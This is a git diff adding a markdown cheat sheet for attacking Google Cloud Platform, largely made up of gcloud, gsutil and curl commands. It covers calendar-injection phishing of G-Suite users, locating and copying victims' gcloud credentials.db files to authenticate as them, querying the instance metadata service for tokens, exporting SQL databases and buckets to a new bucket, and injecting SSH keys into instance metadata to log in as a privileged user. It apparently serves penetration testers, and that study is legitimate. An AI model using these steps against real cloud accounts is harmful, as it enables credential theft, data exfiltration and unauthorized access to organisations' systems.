diff --git a/Cloud - GCP.md b/Cloud - GCP.md new file mode 100644 index 0000000..e7d2ce4 --- /dev/null +++ b/Cloud - GCP.md @@ -0,0 +1,286 @@ +# GCP +[GCP Pentesting Guide](https://slashparity.com/?p=938) + +### General +``` +**Tools** +# PurplePanda https://github.com/carlospolop/PurplePanda +# Hayat https://github.com/DenizParlak/hayat +# GCPBucketBrute https://github.com/RhinoSecurityLabs/GCPBucketBrute +# GCP IAM https://github.com/marcin-kolda/gcp-iam-collector +# GCP Firewall Enum: https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_firewall_enum +# Prowler https://github.com/prowler-cloud/prowler + +Auth methods: +• Web Access +• API – OAuth 2.0 protocol +• Access tokens – short lived access tokens for service accounts +• JSON Key Files – Long-lived key-pairs +• Credentials can be federated + +Recon: +• G-Suite Usage + ◇ Try authenticating with a valid company email address at Gmail + +Google Storage Buckets: +• Google Cloud Platform also has a storage service called “Buckets” +• Cloud_enum from Chris Moberly (@initstring) https://github.com/initstring/cloud_enum + ◇ Awesome tool for scanning all three cloud services for buckets and more + ▪ Enumerates: + - GCP open and protected buckets as well as Google App Engine sites + - Azure storage accounts, blob containers, hosted DBs, VMs, and WebApps + - AWS open and protected buckets + +Phising G-Suite: +• Calendar Event Injection +• Silently injects events to target calendars +• No email required +• Google API allows to mark as accepted +• Bypasses the “don’t auto-add” setting +• Creates urgency w/ reminder notification +• Include link to phishing page + +Steal Access Tokens: +• Google JSON Tokens and credentials.db +• JSON tokens typically used for service account access to GCP +• If a user authenticates with gcloud from an instance their creds get stored here: + ~/.config/gcloud/credentials.db + sudo find /home -name "credentials.db" +• JSON can be used to authenticate with gcloud and ScoutSuite + +Post-compromise +• Cloud Storage, Compute, SQL, Resource manager, IAM +• ScoutSuite from NCC group https://github.com/nccgroup/ScoutSuite +• Tool for auditing multiple different cloud security providers +• Create Google JSON token to auth as service account +``` + +### Enumeration +``` +# Authentication with gcloud and retrieve info +gcloud auth login +gcloud auth activate-service-account --key-file creds.json +gcloud auth activate-service-account --project= --key-file=filename.json +gcloud auth list +gcloud init +gcloud config configurations activate stolenkeys +gcloud config list +gcloud organizations list +gcloud organizations get-iam-policy +gcloud projects get-iam-policy +gcloud iam roles list --project= +gcloud beta asset search-all-iam-policies --query policy:"projects/xxxxxxxx/roles/CustomRole436" --project=xxxxxxxx +gcloud projects list +gcloud config set project +gcloud services list +gcloud projects list +gcloud config set project [Project-Id] +gcloud source repos list +gcloud source repos clone + +# Virtual Machines +gcloud compute instances list +gcloud compute instances list --impersonate-service-account AccountName +gcloud compute instances list --configuration=stolenkeys +gcloud compute instances describe +gcloud compute instances describe --zone=ZoneName --format=json | jq -c '.serviceAccounts[].scopes[]' +gcloud beta compute ssh --zone "" "" --project "" +# Puts public ssh key onto metadata service for project +gcloud compute ssh +curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor:Google’ +# Use Google keyring to decrypt encrypted data +gcloud kms decrypt --ciphertext-file=encrypted-file.enc --plaintext-file=out.txt --key --keyring --location global + +# Storage Buckets +List Google Storage buckets +gsutil ls +gsutil ls -r gs:// +gsutil cat gs://bucket-name/anyobject +gsutil cp gs://bucketid/item ~/ + +# Webapps & SQL +gcloud app instances list +gcloud sql instances list +gcloud spanner instances list +gcloud bigtable instances list +gcloud sql databases list --instance +gcloud spanner databases list --instance + +# Export SQL databases and buckets +# First copy buckets to local directory +gsutil cp gs://bucket-name/folder/ . +# Create a new storage bucket, change perms, export SQL DB +gsutil mb gs:// +gsutil acl ch -u gs:// +gcloud sql export sql gs:///sqldump.gz --database= + +# Networking +gcloud compute networks list +gcloud compute networks subnets list +gcloud compute vpn-tunnels list +gcloud compute interconnects list +gcloud compute firewall-rules list +gcloud compute firewall-rules describe + +# Containers +gcloud container clusters list +# GCP Kubernetes config file ~/.kube/config gets generated when you are authenticated with +gcloud container clusters get-credentials --region +kubectl cluster-info + +# Serverless (Lambda functions) +gcloud functions list +gcloud functions describe +gcloud functions logs read --limit +# Gcloud stores creds in ~/.config/gcloud/credentials.db Search home directories +sudo find /home -name "credentials.db +# Copy gcloud dir to your own home directory to auth as the compromised user +sudo cp -r /home/username/.config/gcloud ~/.config +sudo chown -R currentuser:currentuser ~/.config/gcloud +gcloud auth list + +# Databases +gcloud sql databases list +gcloud sql backups list --instance=test + +# Metadata Service URL +# metadata.google.internal = 169.254.169.254 +curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H +"Metadata-Flavor: Google" + +# Interesting metadata instance urls: +http://169.254.169.254/computeMetadata/v1/ +http://metadata.google.internal/computeMetadata/v1/ +http://metadata/computeMetadata/v1/ +http://metadata.google.internal/computeMetadata/v1/instance/hostname +http://metadata.google.internal/computeMetadata/v1/instance/id +http://metadata.google.internal/computeMetadata/v1/project/project-id + +# Get access scope +http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor:Google' + +# Get snapshot from instance and create instance from it +gcloud compute snapshots list +gcloud compute instances create instance-2 --source-snapshot=snapshot-1 --zone=us-central1-a +``` + +### Attacks +``` +# Check ssh keys attached to instance +gcloud compute instances describe instance-1 --zone=us-central1-a --format=json | jq '.metadata.items[].value' +# Check for "privilegeduser:ssh-rsa" and generate ssh keys with same username and paste in file +ssh-keygen -t rsa -C "privilegeduser" -f ./underprivuser +# Something like: +privilegeduser:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDFGrK8V2k0xBeSzN+oUgnRLSIgUED7ayeUJJ10ryEFR0xJbFeGsRAL5LUzw1DTT9gRKmcMTjmZNU3E99bwyytV0fLnGVRIZ63oC8IdTESR0g8EnU6yam/ntq6gZF5QRcES3gaZlnssOQQhw0rvcCB7o5oM1zCDQtgJXAu/2UI6yKf3xdlcHdrULbKTR+0c7r2FWMLgdghGsA+yH3leHJWjDE/WJ1mqf+ZE+RvwLZ8TmVFJmI37xoKEeVnkmOrOe/TMYvtuzSQduHEUhhfjB8YPUYH7dGHyVPlRp/0Hsrjauf5//zNN9dyAZisElgF7CnJmtJVizfDxlXd/nwrVC8nf2xzbi8nc24STfTg3+lR1f73Z5xN9waPl3eHMNy7nXvShxSO01ZwwuyTmjNh83ik1PJjNU= privilegeduser +privilegeduser:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDnLriKvJcwZ2eRUbYpy7ZiZrZub+ZblHgKhATPnRjEXK7Q5U3vOFutCeMavxQ82yIwne6b6LzDAfKeS6wlez1ll2npGhKpb8mAM+ZIKxdTAoAhenOlLlmMyYHhJs/UjkTtj7TZDIEa/uZjZgClK5fmgkYjprsRbPOtAru8fBAOAWfMtrXYFmUJy94iMIvYpRuUPTZ0XUkzmyETNspZOwoOd+K2yTmFor4mWIgTzbaeAtJA+b+nQmXM1Ya1RfalpQsomXnkhqihh/wmqJMDGIJT1YgepMxbj4wy5WyUlE4Ub+/Wh7Lyu51jaRJ++FYh/pgb3m3d8t7B6b2Jj7ldxicQSPu6Mc9TZ5QrPx91dOe/Mzmte2kW7AF8xXo+Se71Ffc5csupUo62uyeXt12F+qNiqHeJXSomxck7rRwonnUhyNJ2icCPogsbDNDjHvdXmGsrXNFU= privilegeduser +# Upload the file with the 2 keys and access to the instance +gcloud compute instances add-metadata instance-1 --metadata-from-file ssh-keys=keys.txt --zone us-central1-a +ssh -i underprivuser privilegeduser@xx.xx.xx.xx + +# Re-authentication the account keys +# Find keys in instance +cd /home//.config/gcloud +cat credentials.db +# Copy the credentials, make a new json file inside your computer and paste it. +gcloud auth activate-service-account --key-file .json +# Now can access API +``` + +### Tools +* https://github.com/prowler-cloud/prowler +``` +prowler gcp + +# check for the most important checks in terms of severity +prowler gcp --severity critical high +``` + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +